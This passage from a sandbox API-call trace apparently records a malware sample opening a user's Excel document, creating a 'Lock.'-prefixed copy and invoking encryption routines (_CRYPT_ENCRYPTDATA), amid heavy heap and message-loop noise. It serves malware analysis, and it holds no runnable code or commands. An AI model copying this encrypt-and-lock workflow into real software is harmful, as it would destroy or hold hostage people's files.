wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.688] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.688] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0264.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0264.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0264.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0264.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0264.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0264.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0264.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0264.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0264.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0264.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0264.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0264.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0264.689] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/kw9ZLIvDnQk.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\kw9zlivdnqk.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0264.689] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0264.689] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0264.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0264.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0264.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0264.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0264.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0264.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0264.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0264.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0264.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0264.690] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0264.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0264.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0264.690] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0264.690] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0264.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0264.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0264.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0264.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0264.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0264.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0264.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0264.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0264.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0264.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0264.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0264.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0264.690] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0264.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0264.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0264.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0264.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be08a8 [0264.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0264.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0264.691] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.kw9ZLIvDnQk.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.kw9zlivdnqk.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0264.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0264.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0264.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0264.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0264.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0264.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0264.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0264.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0264.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0264.692] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0264.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0264.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0264.692] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0264.692] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0264.692] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0264.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0264.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0264.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0264.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0264.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0264.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0264.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0264.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0264.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0264.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0264.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0264.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0264.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0264.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0264.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x1251020 [0264.696] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0264.696] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0xa81, lpOverlapped=0x0) returned 1 [0264.698] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0264.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0264.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0264.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0264.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0264.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa81) returned 0x2f16018 [0264.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1251020 | out: hHeap=0x970000) returned 1 [0264.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0264.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0264.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0264.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0264.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0264.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0264.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0264.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0264.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa81) returned 0x2f16aa8 [0264.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0264.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0264.702] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0264.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0264.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0264.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0264.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0264.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa81) returned 0x2f16018 [0264.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0264.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0264.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0264.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0264.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0264.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0264.702] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0264.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0264.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0264.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0264.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0264.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0264.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0264.703] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0264.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0264.703] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0264.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0264.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0264.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0264.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0264.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0264.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0264.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0264.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa81) returned 0x2f16018 [0264.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0264.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ee8 [0264.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0264.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0264.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0264.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d38 [0264.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0264.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f08 [0264.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0264.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0264.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0264.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0264.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0264.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0264.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0264.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0264.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0264.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa81) returned 0x2f17538 [0264.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0264.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0264.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0264.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0264.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0264.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0264.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0264.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0264.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0264.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0264.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0264.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0264.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0264.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0264.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0264.705] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0264.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0264.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0264.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0264.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0264.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0264.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0264.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0264.705] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.705] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.705] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.706] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.706] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.706] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0264.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0264.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0264.706] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.706] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0264.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0264.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0264.706] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0264.706] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0264.706] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.706] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0264.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0264.707] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0264.707] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0264.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0264.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.707] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.707] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.707] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.707] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0264.707] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.707] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0264.708] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, 